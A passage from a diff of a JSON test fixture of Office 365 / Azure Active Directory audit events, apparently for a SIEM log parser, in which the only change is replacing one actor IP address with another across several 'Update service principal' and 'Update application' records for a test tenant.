Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{
\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -19459,9 +19459,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:42:45", "ExtendedProperties": [ { 
@@ -19676,7 +19676,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:42:45\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{
\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"531446ed-abd2-468f-96a8-a4dcc7b05168\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:42:45.1042022Z\"},{\"Name\":\"env_epoch\",\"Value\":\"VYXPT\"},{\"Name\":\"env_seqNum\",\"Value\":\"45826464\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##51f1503a-20a3-43cd-b898-bea330e149be_00000000-0000-0000-0000-000000000000_51f1503a-20a3-43cd-b898-bea330e149be\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR559\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"15adbe69-7974-41ec-8341-208456600ad3\",\"ModifiedProperties\":[{\"Name\":\"Included Updated 
Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -19706,9 +19706,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:42:45", "ExtendedProperties": [ { 
@@ -19923,7 +19923,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:37.2045249Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34620418\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ad2523c5-ea21-4329-8c31-ccbd1af8c337_00000000-0000-0000-0000-000000000000_ad2523c5-ea21-4329-8c31-ccbd1af8c337\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d23b201c-5436-4ecc-a789-18d3f00ea76c\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:37\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"811fd012-35a6-4a0c-abce-79fb08b9ab6c\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
